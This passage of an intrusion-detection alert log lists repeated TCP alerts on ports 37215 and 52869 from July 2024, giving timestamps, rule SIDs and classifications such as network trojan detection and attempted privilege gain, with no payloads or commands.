                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.509837
                      SID:2025132
                      Source Port:54854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.632393
                      SID:2829579
                      Source Port:38378
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.272788
                      SID:2831300
                      Source Port:37376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.546480
                      SID:2831300
                      Source Port:56136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.280127
                      SID:2025132
                      Source Port:36392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.816074
                      SID:2835222
                      Source Port:39208
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.591397
                      SID:2027339
                      Source Port:44614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.061779
                      SID:2829579
                      Source Port:37316
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.408559
                      SID:2027339
                      Source Port:43712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.041672
                      SID:2027339
                      Source Port:46152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.703494
                      SID:2831300
                      Source Port:60618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.297792
                      SID:2025132
                      Source Port:50068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.296076
                      SID:2829579
                      Source Port:46558
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.101588
                      SID:2027339
                      Source Port:35156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.929013
                      SID:2835222
                      Source Port:56196
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.093693
                      SID:2025132
                      Source Port:56640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.476083
                      SID:2027339
                      Source Port:40904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.701127
                      SID:2027339
                      Source Port:53308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.211046
                      SID:2829579
                      Source Port:38176
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222008
                      SID:2835222
                      Source Port:35550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.336908
                      SID:2835222
                      Source Port:46646
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.800757
                      SID:2027339
                      Source Port:41210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.923917
                      SID:2835222
                      Source Port:32936
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.085956
                      SID:2027339
                      Source Port:55404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.034156
                      SID:2831300
                      Source Port:33716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:26.031343
                      SID:2025132
                      Source Port:53470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.977603
                      SID:2835222
                      Source Port:42646
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.826234
                      SID:2831300
                      Source Port:42172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.984532
                      SID:2025132
                      Source Port:44358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:06.994337
                      SID:2835222
                      Source Port:37978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.469580
                      SID:2025132
                      Source Port:43018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.188773
                      SID:2831300
                      Source Port:60842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:26.100052
                      SID:2027339
                      Source Port:47786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.388927
                      SID:2027339
                      Source Port:36042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.709674
                      SID:2831300
                      Source Port:47420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.991548
                      SID:2829579
                      Source Port:44750
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.397238
                      SID:2027339
                      Source Port:34138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.627181
                      SID:2025132
                      Source Port:49196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.098909
                      SID:2835222
                      Source Port:40604
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.311124
                      SID:2829579
                      Source Port:59350
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.115230
                      SID:2027339
                      Source Port:55048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.667513
                      SID:2027339
                      Source Port:55916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.321431
                      SID:2025132
                      Source Port:41312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.666677
                      SID:2027339
                      Source Port:47078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:03:46.099099
                      SID:2027339
                      Source Port:42158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.192052
                      SID:2829579
                      Source Port:43088
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.648489
                      SID:2829579
                      Source Port:54854
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.234960
                      SID:2025132
                      Source Port:36880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.810790
                      SID:2025132
                      Source Port:43706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.015544
                      SID:2025132
                      Source Port:37228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.176893
                      SID:2025132
                      Source Port:50676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.076414
                      SID:2835222
                      Source Port:53600
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.189694
                      SID:2027339
                      Source Port:58170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.590034
                      SID:2025132
                      Source Port:41408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.212590
                      SID:2025132
                      Source Port:37236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.604763
                      SID:2027339
                      Source Port:58346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.979565
                      SID:2835222
                      Source Port:35010
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.841155
                      SID:2027339
                      Source Port:49646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.585039
                      SID:2027339
                      Source Port:46868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.082771
                      SID:2829579
                      Source Port:42202
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.696197
                      SID:2027339
                      Source Port:44628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.674251
                      SID:2027339
                      Source Port:53446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.333070
                      SID:2027339
                      Source Port:37974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.816521
                      SID:2829579
                      Source Port:42760
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.113054
                      SID:2829579
                      Source Port:42612
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.150638
                      SID:2835222
                      Source Port:60702
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.321300
                      SID:2829579
                      Source Port:58234
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.745095
                      SID:2027339
                      Source Port:49278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.578727
                      SID:2831300
                      Source Port:60194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.377547
                      SID:2831300
                      Source Port:49430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.044152
                      SID:2829579
                      Source Port:40310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.045749
                      SID:2829579
                      Source Port:42846
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.287821
                      SID:2831300
                      Source Port:59420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.918789
                      SID:2831300
                      Source Port:57088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.312411
                      SID:2831300
                      Source Port:43376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.048825
                      SID:2829579
                      Source Port:41030
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.026812
                      SID:2829579
                      Source Port:48082
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.592479
                      SID:2027339
                      Source Port:36596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.098864
                      SID:2831300
                      Source Port:51472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.114267
                      SID:2835222
                      Source Port:38558
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.608320
                      SID:2027339
                      Source Port:49086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.096752
                      SID:2829579
                      Source Port:38924
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.960666
                      SID:2025132
                      Source Port:43428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.198681
                      SID:2027339
                      Source Port:51954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.405782
                      SID:2027339
                      Source Port:54972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.950526
                      SID:2025132
                      Source Port:39512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.328066
                      SID:2831300
                      Source Port:46390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.220983
                      SID:2829579
                      Source Port:55530
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.206220
                      SID:2027339
                      Source Port:46404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.052569
                      SID:2027339
                      Source Port:34074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.165240
                      SID:2027339
                      Source Port:33120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.159715
                      SID:2025132
                      Source Port:49550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.159648
                      SID:2831300
                      Source Port:53638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.993916
                      SID:2025132
                      Source Port:44844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.811941
                      SID:2025132
                      Source Port:52716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:59.092655
                      SID:2027339
                      Source Port:53282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.199235
                      SID:2027339
                      Source Port:49528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.430069
                      SID:2025132
                      Source Port:59360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.837054
                      SID:2027339
                      Source Port:56282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.651026
                      SID:2835222
                      Source Port:52146
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.155981
                      SID:2027339
                      Source Port:52440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312209
                      SID:2831300
                      Source Port:57414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.233741
                      SID:2027339
                      Source Port:48552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.090121
                      SID:2027339
                      Source Port:45414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.741840
                      SID:2025132
                      Source Port:50022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.157444
                      SID:2829579
                      Source Port:44268
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.151857
                      SID:2025132
                      Source Port:42232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.967403
                      SID:2025132
                      Source Port:46110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.868029
                      SID:2831300
                      Source Port:39320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.652877
                      SID:2831300
                      Source Port:49584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:32.039718
                      SID:2835222
                      Source Port:33136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.718842
                      SID:2027339
                      Source Port:57316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.047497
                      SID:2831300
                      Source Port:32834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.168569
                      SID:2829579
                      Source Port:35840
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.723651
                      SID:2829579
                      Source Port:52594
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.320661
                      SID:2027339
                      Source Port:53926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.679677
                      SID:2027339
                      Source Port:56988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.603921
                      SID:2027339
                      Source Port:42704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.524925
                      SID:2027339
                      Source Port:59212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.987638
                      SID:2025132
                      Source Port:44574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.642449
                      SID:2835222
                      Source Port:55946
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.952783
                      SID:2835222
                      Source Port:55262
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.126316
                      SID:2027339
                      Source Port:38786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.841280
                      SID:2831300
                      Source Port:46040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.286262
                      SID:2027339
                      Source Port:34938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.820149
                      SID:2829579
                      Source Port:60704
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.655551
                      SID:2829579
                      Source Port:37006
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.915904
                      SID:2835222
                      Source Port:48890
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.041672
                      SID:2025132
                      Source Port:41128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.143923
                      SID:2027339
                      Source Port:44316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.207937
                      SID:2025132
                      Source Port:38140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.656128
                      SID:2829579
                      Source Port:41372
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.820979
                      SID:2835222
                      Source Port:40132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.322860
                      SID:2835222
                      Source Port:37002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.444710
                      SID:2025132
                      Source Port:50442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.609855
                      SID:2027339
                      Source Port:45964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.655551
                      SID:2835222
                      Source Port:48700
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.249042
                      SID:2027339
                      Source Port:53186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.640312
                      SID:2829579
                      Source Port:48356
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.313163
                      SID:2027339
                      Source Port:53996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.709674
                      SID:2831300
                      Source Port:36216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.244235
                      SID:2027339
                      Source Port:36306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.078337
                      SID:2025132
                      Source Port:40646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.324295
                      SID:2027339
                      Source Port:39042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639011
                      SID:2829579
                      Source Port:42978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.874055
                      SID:2027339
                      Source Port:33176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.978983
                      SID:2831300
                      Source Port:59718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.663524
                      SID:2027339
                      Source Port:47332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.387777
                      SID:2027339
                      Source Port:60138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.031141
                      SID:2025132
                      Source Port:48568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:07.969418
                      SID:2027339
                      Source Port:38164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.021221
                      SID:2025132
                      Source Port:49184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.172943
                      SID:2835222
                      Source Port:56586
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.600680
                      SID:2027339
                      Source Port:60816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222163
                      SID:2829579
                      Source Port:44174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.372532
                      SID:2027339
                      Source Port:52392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.547419
                      SID:2025132
                      Source Port:39674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.093784
                      SID:2831300
                      Source Port:40746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.091220
                      SID:2027339
                      Source Port:56428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.658221
                      SID:2829579
                      Source Port:54958
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.317366
                      SID:2025132
                      Source Port:51816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.044223
                      SID:2829579
                      Source Port:50906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.140632
                      SID:2829579
                      Source Port:49352
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.291616
                      SID:2835222
                      Source Port:48096
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.054387
                      SID:2829579
                      Source Port:41240
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.983381
                      SID:2025132
                      Source Port:41326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.058922
                      SID:2829579
                      Source Port:48120
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.951743
                      SID:2831300
                      Source Port:42826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:13.589327
                      SID:2025132
                      Source Port:43516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.983105
                      SID:2835222
                      Source Port:45186
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222139
                      SID:2835222
                      Source Port:50028
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.076414
                      SID:2835222
                      Source Port:50714
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.606848
                      SID:2027339
                      Source Port:39260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.974580
                      SID:2835222
                      Source Port:48674
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.027082
                      SID:2829579
                      Source Port:41772
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.105395
                      SID:2829579
                      Source Port:42942
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.023836
                      SID:2025132
                      Source Port:43992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.991336
                      SID:2835222
                      Source Port:58400
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.790680
                      SID:2027339
                      Source Port:54812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.349768
                      SID:2027339
                      Source Port:56034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
